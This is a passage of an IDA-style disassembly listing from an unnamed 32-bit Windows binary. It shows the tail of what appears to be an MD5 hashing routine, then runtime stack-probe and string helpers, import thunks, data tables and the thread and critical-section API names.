add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A52
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A52
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A52
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A52
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A52
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A52
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A52
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A52
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A52
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A52
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A52
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A52
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A52
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A52
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A52
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A5F
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A5F
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A5F
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A5F
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A5F
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A5F
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A5F
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A5F
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A5F
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A5F
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A5F
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A5F
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A5F
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A5F
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A5F
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A5F
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A66
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A66
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A66
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A66
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A66
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A66
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A66
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A66
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A66
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A66
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A66
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A66
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A66
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A66
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A66
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A66
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, ds:10014B68h
add [edi], eax
mov eax, ds:10014B6Ch
add [edi+4], eax
mov eax, ds:10014B70h
add [edi+8], eax
mov eax, ds:10014B74h
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_424A96 endp
; =============== S U B R O U T I N E =======================================
sub_4252E1 proc near ; CODE XREF: sub_4252FE+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_4252E2: ; CODE XREF: sub_4252E1+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_4252E2
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_4252E1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4252FE proc near ; CODE XREF: sub_41F465+42�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_42532E
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_4252E1
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_42532E: ; CODE XREF: sub_4252FE+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_4252FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 40C03100h, 0CC2h, 3CD95000h, 24048B24h, 2434BA0Fh, 0C816608h
db 24h, 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425368
loc_425357: ; CODE XREF: sub_425368+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_425368
; ---------------------------------------------------------------------------
db 50h, 0D9h, 3Ch
dd 0F3EB5824h
; =============== S U B R O U T I N E =======================================
sub_425368 proc near ; CODE XREF: .data:loc_41A5B4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425357 SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_425357
sub_425368 endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_425379 proc near ; CODE XREF: sub_41A999+8�p
; sub_41B7BE+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_42537A: ; CODE XREF: sub_425379+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_42537A
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_425379 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_425399 proc near ; CODE XREF: sub_41A999+243�p
; sub_41A999+5A7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_425399 endp
; ---------------------------------------------------------------------------
align 4
dd 0AC25FF00h, 90100150h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4253D1 proc near ; CODE XREF: sub_41A669+10�p
jmp dword ptr ds:100150B0h
sub_4253D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4253DD proc near ; CODE XREF: sub_41A48D+13�p
jmp dword ptr ds:100150B4h
sub_4253DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4253E9 proc near ; CODE XREF: sub_41A5D0+33�p
; sub_41A5D0+45�p ...
jmp dword ptr ds:100150C0h
sub_4253E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4253F5 proc near ; CODE XREF: sub_41A5D0+B�p
; sub_41A5D0+17�p ...
jmp dword ptr ds:100150C4h
sub_4253F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 0C825FF00h, 90100150h, 90h, 0CC25FF00h, 90100150h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425419 proc near ; CODE XREF: sub_41A669+4E�p
; sub_41A669+87�p
jmp dword ptr ds:100150D0h
sub_425419 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425425 proc near ; CODE XREF: .data:0041A593�p
jmp dword ptr ds:100150D4h
sub_425425 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425431 proc near ; CODE XREF: sub_41A5D0+71�p
; sub_41A5D0+86�p
jmp dword ptr ds:100150D8h
sub_425431 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42543D proc near ; CODE XREF: sub_41A669+9E�p
jmp dword ptr ds:100150DCh
sub_42543D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 71h dup(0)
dd 0BF3000h, 10h, 4 dup(0)
dd 732500h, 72007700h, 1Ch dup(0)
dd 300h, 600h, 200h, 500h, 400h, 2 dup(600h), 100h, 700h
dd 800h, 300h, 900h, 200h, 700h, 0
dd 2 dup(700h), 600h, 200h, 300h, 100h, 900h, 100h, 400h
dd 100h, 2 dup(700h), 600h, 300h, 800h, 2 dup(600h), 500h
dd 800h, 300h, 2 dup(500h), 600h, 900h, 800h, 300h, 800h
dd 0
dd 300h, 900h, 600h, 200h, 600h, 800h, 700h, 2 dup(900h)
dd 100h, 400h, 0
dd 100h, 200h, 700h, 400h, 500h, 400h, 200h, 2 dup(0)
dd 200h, 900h, 200h, 600h, 300h, 700h, 200h, 500h, 700h
dd 400h, 500h, 900h, 400h, 500h, 0
dd 600h, 700h, 200h, 900h, 100h, 300h, 400h, 100h, 800h
dd 300h, 400h, 300h, 2 dup(500h), 100h, 500h, 600h, 100h
dd 900h, 500h, 800h, 400h, 500h, 300h, 700h, 600h, 400h
dd 0
dd 500h, 200h, 400h, 0
dd 900h, 100h, 900h, 200h, 800h, 200h, 900h, 400h, 900h
dd 400h, 100h, 200h, 2 dup(400h), 900h, 2 dup(600h), 0Bh dup(0)
dd 149B200h, 0E86010h, 61000000h, 0E9h, 0
dd 1100h, 0Fh dup(0)
db 0
db 0A5h, 0EEh, 0F7h
db 0E1h ;
db 2Ch, 7Eh, 0FDh
db 0BFh ;
db 7Fh, 0E8h, 9Ah
db 86h ;
db 82h, 40h, 24h
db 0CCh ;
db 0E2h, 0DDh, 6Ah
db 0D7h ;
db 2 dup(0E1h), 77h
db 1Bh
db 0B0h, 15h, 52h
db 50h ; P
db 56h, 64h, 4Bh
db 0D2h ;
db 6Bh, 7Ch, 35h
db 3Dh ; =
db 0D5h, 85h, 0Eh
db 28h ; (
db 0F9h, 51h, 0B0h
db 1Ah
db 44h, 87h, 4Eh
db 1Eh
db 0DFh, 0CCh, 83h
db 0E3h ;
db 37h, 47h, 3Dh
db 32h ; 2
db 18h, 5, 0F8h
db 14h
db 0BFh, 37h, 6
db 6Eh ; n
align 10h
db 0
db 0D0h, 9Ch, 0
db 10h
db 4Bh, 7Fh, 0
db 10h
db 0BFh, 7Bh, 0
db 10h
db 0A7h, 51h, 0
db 10h
db 0EEh, 89h, 0
db 10h
db 94h, 92h, 0
db 10h
db 89h, 5Eh, 0
db 10h
align 10h
db 0
db 0B8h, 25h, 0
db 10h
db 0A1h, 25h, 0
db 10h
db 0C1h, 9Eh, 0
db 10h
db 7Fh, 5Ch, 0
db 10h
db 0BCh, 2Dh, 0
db 10h
db 6Bh, 50h, 0
db 10h
db 0E8h, 9Eh, 0
db 10h
db 74h, 33h, 1
db 10h
align 4
db 0
db 8Ch, 54h, 0
db 10h
db 0AFh, 51h, 0
db 10h
db 60h, 5Eh, 0
db 10h
db 43h, 7Fh, 0
db 10h
db 1Ah, 46h, 0
db 10h
db 33h, 26h, 0
db 10h
db 57h, 28h, 0
db 10h
db 98h, 33h, 1
db 10h
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Eh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Fh, 2 dup(0)
db 0
db 34h, 2 dup(0)
db 0
db 35h, 2 dup(0)
db 0
db 36h, 2 dup(0)
db 0
db 37h, 2 dup(0)
db 0
db 38h, 2 dup(0)
db 0
db 39h, 2 dup(0)
db 0
db 3Ah, 2 dup(0)
db 0
db 3Bh, 2 dup(0)
db 0
db 3Ch, 2 dup(0)
db 0
db 3Dh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
align 4
db 0
db 1, 2 dup(0)
db 0
db 2, 2 dup(0)
db 0
db 3, 2 dup(0)
db 0
db 4, 2 dup(0)
db 0
db 5, 2 dup(0)
db 0
db 6, 2 dup(0)
db 0
db 7, 2 dup(0)
db 0
db 8, 2 dup(0)
db 0
db 9, 2 dup(0)
db 0
db 0Ah, 2 dup(0)
db 0
db 0Bh, 2 dup(0)
db 0
db 0Ch, 2 dup(0)
db 0
db 0Dh, 2 dup(0)
db 0
db 0Eh, 2 dup(0)
db 0
db 0Fh, 2 dup(0)
db 0
db 10h, 2 dup(0)
db 0
db 11h, 2 dup(0)
db 0
db 12h, 2 dup(0)
db 0
db 13h, 2 dup(0)
db 0
db 14h, 2 dup(0)
db 0
db 15h, 2 dup(0)
db 0
db 16h, 2 dup(0)
db 0
db 17h, 2 dup(0)
db 0
db 18h, 2 dup(0)
db 0
db 19h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 1Ah, 2 dup(0)
db 0
db 1Bh, 2 dup(0)
db 0
db 1Ch, 2 dup(0)
db 0
db 1Dh, 2 dup(0)
db 0
db 1Eh, 2 dup(0)
db 0
db 1Fh, 2 dup(0)
db 0
db 20h, 2 dup(0)
db 0
db 21h, 2 dup(0)
db 0
db 22h, 2 dup(0)
db 0
db 23h, 2 dup(0)
db 0
db 24h, 2 dup(0)
db 0
db 25h, 2 dup(0)
db 0
db 26h, 2 dup(0)
db 0
db 27h, 2 dup(0)
db 0
db 28h, 2 dup(0)
db 0
db 29h, 2 dup(0)
db 0
db 2Ah, 2 dup(0)
db 0
db 2Bh, 2 dup(0)
db 0
db 2Ch, 2 dup(0)
db 0
db 2Dh, 2 dup(0)
db 0
db 2Eh, 2 dup(0)
db 0
db 2Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 0
db 31h, 2 dup(0)
db 0
db 32h, 2 dup(0)
db 0
db 33h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 0BFh, 13h, 0
db 10h
db 0C7h, 13h, 0
db 10h
db 0Dh, 14h, 0
db 10h
db 4Bh, 14h, 0
db 10h
aCreatethread_1 db 'CreateThread',0
aEntercritica_0 db 'EnterCriticalSection',0
aInitializecr_0 db 'InitializeCriticalSection',0
aLeavecritica_0 db 'LeaveCriticalSection',0
align 4
db 0
db 5, 0, 0D4h
db 0FAh ;
aA db '',0
dw 4
db 0F2h ;
